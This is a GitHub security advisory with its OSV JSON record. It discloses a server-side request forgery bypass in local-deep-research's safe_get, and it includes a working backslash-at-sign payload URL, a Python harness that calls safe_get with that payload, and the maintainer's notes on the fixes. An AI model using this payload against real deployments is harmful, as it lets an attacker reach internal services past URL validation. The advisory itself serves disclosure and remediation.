GHSA-G23J-2VWM-5C25

Vulnerability from github – Published: 2026-05-28 19:18 – Updated: 2026-05-28 19:18
Summary
local-deep-research has an SSRF bypass in `safe_get`
Details

Summary

The URL validation logic in local-deep-research contains a logic flaw that lets attackers bypass it, leading to server-side request forgery (SSRF).

Details

The project validates input URLs with validate_url, which extracts the host portion of the URL with urlparse and runs its SSRF checks against that host.

However, urlparse and the library that actually sends the request parse URLs differently. In safe_get, for example, validate_url performs the SSRF check first, and requests.get then sends the actual request.

The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:

  • urlparse() treats \ as an ordinary character and @ as the userinfo-host delimiter, so everything before @ becomes userinfo and the extracted hostname is 1.1.1.1 (public).
  • requests treats \ as the start of the path, so the host ends before it and the connection goes to 127.0.0.1 (internal).
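The disagreement can be reproduced with the standard library alone. The sketch below compares urlparse with a simplified model of a parser that ends the authority at the first backslash. The helper host_backslash_terminated and its regular expression are illustrative assumptions, not code taken from requests or urllib3, and the model does not handle bracketed IPv6 hosts.

```python
import re
from urllib.parse import urlparse

# The advisory PoC; the doubled backslash is one literal backslash.
POC_URL = "http://127.0.0.1:6666\\@1.1.1.1"

# Assumed, simplified model: the authority ends at the first '/', '\',
# '?' or '#'. This is a hypothetical stand-in for the HTTP client's parser.
_AUTHORITY_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^\\/?#]*)")


def host_backslash_terminated(url: str) -> str:
    """Return the host as seen by the backslash-terminating model."""
    match = _AUTHORITY_RE.match(url)
    if match is None:
        raise ValueError(f"no authority found in {url!r}")
    authority = match.group(1)
    hostport = authority.rpartition("@")[2]  # drop userinfo, if any
    # Strip a trailing ":port" (bracketed IPv6 hosts are not handled).
    return hostport.rsplit(":", 1)[0] if ":" in hostport else hostport


# What a urlparse-based validator checks.
validator_host = urlparse(POC_URL).hostname
# What the modeled client would connect to.
client_host = host_backslash_terminated(POC_URL)

print("urlparse hostname:         ", validator_host)
print("backslash-terminated model:", client_host)
```

For the PoC URL, urlparse reports 1.1.1.1 while the model reports 127.0.0.1, which is the gap the bypass relies on.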

Below is a test script that loads safe_get from the project source and calls it directly.

#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""

from __future__ import annotations

import importlib.util
import enum
import sys
import types
from pathlib import Path

# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
    r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)

# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
    class _CompatStrEnum(str, enum.Enum):
        pass

    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]


def _load_safe_get():
    """Load safe_get directly from file, bypassing package __init__ imports."""
    ldr_pkg_name = "local_deep_research"
    security_pkg_name = "local_deep_research.security"

    # Build lightweight package modules so relative imports in safe_requests.py
    # resolve without executing package __init__.py files.
    if ldr_pkg_name not in sys.modules:
        ldr_pkg = types.ModuleType(ldr_pkg_name)
        ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")]  # type: ignore[attr-defined]
        sys.modules[ldr_pkg_name] = ldr_pkg

    if security_pkg_name not in sys.modules:
        security_pkg = types.ModuleType(security_pkg_name)
        security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")]  # type: ignore[attr-defined]
        sys.modules[security_pkg_name] = security_pkg

    module_name = "local_deep_research.security.safe_requests"
    module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"

    spec = importlib.util.spec_from_file_location(module_name, module_path)
    if spec is None or spec.loader is None:
        raise ImportError(f"Cannot load module from {module_path}")

    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module.safe_get


safe_get = _load_safe_get()


def main() -> None:
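    # Baseline: a plainly internal URL, which the validator blocks.
    url = "http://127.0.0.1:6666"
    # Bypass: uncomment to send the PoC URL instead (the raw string keeps
    # the backslash literal and avoids an invalid-escape warning).
    # url = r"http://127.0.0.1:6666\@1.1.1.1"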

    safe_get(url, timeout=15)


if __name__ == "__main__":
    main()

With http://127.0.0.1:6666/, the existing check recognizes an internal network address and blocks the request.

With http://127.0.0.1:6666\@1.1.1.1, however, the check extracts the host as 1.1.1.1, a public IP address, so validation passes. When the request is actually sent, requests.get connects to 127.0.0.1:6666, so the check is bypassed and the SSRF succeeds.

PoC

http://127.0.0.1:6666\@1.1.1.1

Impact

SSRF


Maintainer note (2026-05-15)

Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation spans four PRs, all merged to main and shipped in v1.6.10:

#3873 (merged 2026-05-08), the load-bearing fix for the parser-differential bypass:

  • New RFC_FORBIDDEN_URL_CHARS_RE in security/ssrf_validator.py rejects URLs containing backslash, ASCII control bytes, or whitespace. RFC 3986 forbids these, and their presence signals a parser-differential attempt.
  • Host extraction switched from urllib.parse.urlparse(url).hostname to urllib3.util.parse_url(url).host. urllib3 is the parser requests uses internally, so the validator and the HTTP client now agree on the destination by construction, closing the \@ divergence that drove the PoC.
  • Same two-layer defence applied to NotificationURLValidator.validate_service_url.
  • 53 new tests across test_ssrf_validator.py, test_notification_validator.py, test_safe_requests.py, and test_ssrf_redirect_bypass.py, including the advisory PoC http://127.0.0.1:6666\@1.1.1.1 and the post-prepare canonical form http://127.0.0.1:6666/%5C@1.1.1.1.
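A minimal sketch of the two-layer idea described for #3873, assuming a validator that only needs to handle IP-literal hosts. The names FORBIDDEN_URL_CHARS_RE and is_url_allowed are hypothetical and are not the project's code. The sketch extracts the host with urlsplit to stay within the standard library, whereas the actual fix uses urllib3.util.parse_url; hostnames that need DNS resolution are deliberately left out of scope.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Hypothetical stand-in for RFC_FORBIDDEN_URL_CHARS_RE: backslash, ASCII
# control bytes (0x00-0x1F and 0x7F), and whitespace.
FORBIDDEN_URL_CHARS_RE = re.compile(r"[\\\x00-\x1f\x7f\s]")


def is_url_allowed(url: str) -> bool:
    """Return True only for http(s) URLs that pass both layers."""
    # Layer 1: reject characters that URL parsers are known to disagree on.
    # This runs on the raw string, before any parser touches it.
    if FORBIDDEN_URL_CHARS_RE.search(url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    # Layer 2: classify the host. Assumption: only IP literals are checked
    # here; a real validator would also resolve hostnames and check the
    # resulting addresses.
    try:
        address = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return True  # not an IP literal; DNS checks are out of scope
    return address.is_global


for candidate in (
    "http://127.0.0.1:6666\\@1.1.1.1",    # advisory PoC
    "http://127.0.0.1:6666/%5C@1.1.1.1",  # post-prepare canonical form
    "http://1.1.1.1/",
):
    print(candidate, "->", is_url_allowed(candidate))
```

The PoC is rejected by the first layer because of the backslash, and the percent-encoded canonical form is rejected by the second layer because its host is 127.0.0.1.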

#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.

#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.

#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16 6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments, but cloud metadata IPs remain blocked regardless.
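The prefix check described for #3932 can be illustrated with the standard ipaddress module. This is a sketch under assumptions: the function name transition_prefix and the label strings are hypothetical, and the NAT64 opt-in and the metadata-IP handling are not modeled.

```python
import ipaddress
from typing import Optional

# The four prefixes named in the maintainer note, keyed by a short label.
TRANSITION_PREFIXES = {
    "6to4": ipaddress.ip_network("2002::/16"),
    "NAT64": ipaddress.ip_network("64:ff9b::/96"),
    "Teredo": ipaddress.ip_network("2001::/32"),
    "discard": ipaddress.ip_network("100::/64"),
}


def transition_prefix(host: str) -> Optional[str]:
    """Return the label of the listed prefix containing host, else None."""
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return None  # not an IP literal
    if address.version != 6:
        return None
    for label, network in TRANSITION_PREFIXES.items():
        if address in network:
            return label
    return None


# 2002:7f00:1:: is a 6to4 address whose embedded IPv4 address is 127.0.0.1.
wrapped = ipaddress.IPv6Address("2002:7f00:1::")
print(transition_prefix(str(wrapped)), wrapped.sixtofour)
```

The last two lines show why these prefixes matter: the 6to4 address carries 127.0.0.1 inside it, so a check that only looks at IPv4 literals would not see the loopback destination.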

Affected versions

  • The specific parser-differential bypass described above exists from v1.3.0 (when validate_url was first introduced) through v1.6.9. The validator used urlparse(url).hostname for that entire span.
  • Versions before v1.3.0 had no SSRF validator at all — requests went directly to requests.get() without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.

In both cases the remediation is the same: upgrade to v1.6.10 or later.
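When checking an installed version against the fixed release, compare numeric components rather than strings, because "1.6.10" sorts before "1.6.9" as text. The helper names below are hypothetical, and the sketch assumes plain numeric release versions such as 1.6.9 or v1.6.10.

```python
from typing import Tuple

# First release containing the fix, per the advisory.
FIXED_VERSION = (1, 6, 10)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.6.9' or 'v1.6.9' into a tuple of integers."""
    return tuple(int(part) for part in version.lstrip("v").split("."))


def is_affected(version: str) -> bool:
    """Return True if the version predates the fixed release."""
    return parse_version(version) < FIXED_VERSION


for candidate in ("1.2.0", "1.6.9", "1.6.10"):
    print(candidate, "affected" if is_affected(candidate) else "fixed")
```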


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "local-deep-research"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-28T19:18:34Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.\n\n### Details\nThe current project uses `validate_url` to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.\n\n\u003cimg width=\"1173\" height=\"1107\" alt=\"QQ20260430-212334-30-1\" src=\"https://github.com/user-attachments/assets/52b356aa-9ad3-4b1d-a472-39a2ada3ea23\" /\u003e\n\nHowever, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in `safe_get`, `validate_url` is first used to perform an SSRF check, and then `requests.get` is used to send the actual request.\n\n\u003cimg width=\"1164\" height=\"1089\" alt=\"QQ20260430-212431-30-2\" src=\"https://github.com/user-attachments/assets/f3decb16-4daa-49e0-861c-273a913487a0\" /\u003e\n\nThe core issue: urlparse() and requests disagree on which host a URL like `http://127.0.0.1:6666\\@1.1.1.1` points to:\n\n- urlparse() treats \\ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public)\n- requests treats \\ as a path character, connecting to `127.0.0.1` (internal)\n\nBelow is a test code I wrote following the code.\n```\n#!/usr/bin/env python3\n\"\"\"Standalone demo: import project via absolute path and call safe_get.\"\"\"\n\nfrom __future__ import annotations\n\nimport importlib.util\nimport enum\nimport sys\nimport types\nfrom pathlib import Path\n\n# Hardcoded absolute path to the project\u0027s \"src\" directory.\nSRC_ROOT = Path(\n    r\"d:\\BaiduNetdiskDownload\\local-deep-research-main\\local-deep-research-main\\src\"\n)\n\n# Python 3.10 compatibility:\n# project constants import StrEnum (available in Python 3.11+).\nif not hasattr(enum, \"StrEnum\"):\n    class _CompatStrEnum(str, enum.Enum):\n        pass\n\n    enum.StrEnum = _CompatStrEnum  
# type: ignore[attr-defined]\n\n\ndef _load_safe_get():\n    \"\"\"Load safe_get directly from file, bypassing package __init__ imports.\"\"\"\n    ldr_pkg_name = \"local_deep_research\"\n    security_pkg_name = \"local_deep_research.security\"\n\n    # Build lightweight package modules so relative imports in safe_requests.py\n    # resolve without executing package __init__.py files.\n    if ldr_pkg_name not in sys.modules:\n        ldr_pkg = types.ModuleType(ldr_pkg_name)\n        ldr_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\")]  # type: ignore[attr-defined]\n        sys.modules[ldr_pkg_name] = ldr_pkg\n\n    if security_pkg_name not in sys.modules:\n        security_pkg = types.ModuleType(security_pkg_name)\n        security_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\" / \"security\")]  # type: ignore[attr-defined]\n        sys.modules[security_pkg_name] = security_pkg\n\n    module_name = \"local_deep_research.security.safe_requests\"\n    module_path = SRC_ROOT / \"local_deep_research\" / \"security\" / \"safe_requests.py\"\n\n    spec = importlib.util.spec_from_file_location(module_name, module_path)\n    if spec is None or spec.loader is None:\n        raise ImportError(f\"Cannot load module from {module_path}\")\n\n    module = importlib.util.module_from_spec(spec)\n    sys.modules[module_name] = module\n    spec.loader.exec_module(module)\n    return module.safe_get\n\n\nsafe_get = _load_safe_get()\n\n\ndef main() -\u003e None:\n    # Hardcoded URL for demonstration.\n    url = \"http://127.0.0.1:6666\"\n    # url = \"http://127.0.0.1:6666\\@1.1.1.1\"\n\n    safe_get(url, timeout=15)\n\n\nif __name__ == \"__main__\":\n    main()\n```\nWhen an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it.\n\n\u003cimg width=\"1694\" height=\"503\" alt=\"QQ20260430-212723-30-3\" src=\"https://github.com/user-attachments/assets/366f684d-9191-4acb-b6a2-b2c3c54f0223\" 
/\u003e\n\nHowever, when an attacker uses `http://127.0.0.1:6666\\@1.1.1.1`, the detection logic resolves the host to `1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack.\n\n\u003cimg width=\"2424\" height=\"477\" alt=\"QQ20260430-212833-30-4\" src=\"https://github.com/user-attachments/assets/bd175e34-d833-44c5-981b-59cfad3406c3\" /\u003e\n\n### PoC\n```\nhttp://127.0.0.1:6666\\@1.1.1.1\n```\n\n### Impact\nSSRF\n\n\n\n---\n\n## Maintainer note (2026-05-15)\n\nThanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation\nspans four PRs, all merged to `main` and shipped in **v1.6.10**:\n\n**#3873** (merged 2026-05-08) \u2014 the load-bearing fix for the parser-differential\nbypass:\n- New `RFC_FORBIDDEN_URL_CHARS_RE` in `security/ssrf_validator.py` rejects\n  URLs containing backslash, ASCII control bytes, or whitespace \u2014 RFC 3986\n  forbids these and their presence signals a parser-differential attempt.\n- Host extraction switched from `urllib.parse.urlparse(url).hostname` to\n  `urllib3.util.parse_url(url).host`. 
`urllib3` is the parser `requests`\n  uses internally, so the validator and the HTTP client now agree on the\n  destination by construction \u2014 closing the `\\@` divergence that drove the\n  PoC.\n- Same two-layer defence applied to `NotificationURLValidator.validate_service_url`.\n- 53 new tests across `test_ssrf_validator.py`, `test_notification_validator.py`,\n  `test_safe_requests.py`, and `test_ssrf_redirect_bypass.py`, including the\n  advisory PoC `http://127.0.0.1:6666\\@1.1.1.1` and the post-prepare canonical\n  form `http://127.0.0.1:6666/%5C@1.1.1.1`.\n\n**#3882** (merged 2026-05-08) \u2014 hardens the metadata-IP block and redacts\nuserinfo from log output so rejected URLs don\u0027t leak credentials to logs.\n\n**#3889** (merged 2026-05-09) \u2014 locks in real-world URL fixtures and behavior\ninvariants from #3873/#3882 as regression tests.\n\n**#3932** (merged 2026-05-10) \u2014 blocks IPv6 transition prefixes (`2002::/16`\n6to4, `64:ff9b::/96` NAT64, `2001::/32` Teredo, `100::/64` discard) so private\nIPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an\noperator opt-in (`LDR_SECURITY_ALLOW_NAT64=true`) for IPv6-only deployments,\nbut cloud metadata IPs remain blocked regardless.\n\n### Affected versions\n\n- **The specific parser-differential bypass** described above exists from\n  **v1.3.0** (when `validate_url` was first introduced) through **v1.6.9**.\n  The validator used `urlparse(url).hostname` for that entire span.\n- **Versions before v1.3.0** had no SSRF validator at all \u2014 requests went\n  directly to `requests.get()` without any host check. Those versions are\n  vulnerable to SSRF via this URL and any other internal address; the\n  parser-differential trick is unnecessary.\n\nIn both cases the remediation is the same: **upgrade to v1.6.10 or later.**",
  "id": "GHSA-g23j-2vwm-5c25",
  "modified": "2026-05-28T19:18:35Z",
  "published": "2026-05-28T19:18:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-g23j-2vwm-5c25"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/LearningCircuit/local-deep-research"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/releases/tag/v1.6.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "local-deep-research has an SSRF bypass in `safe_get`"
}

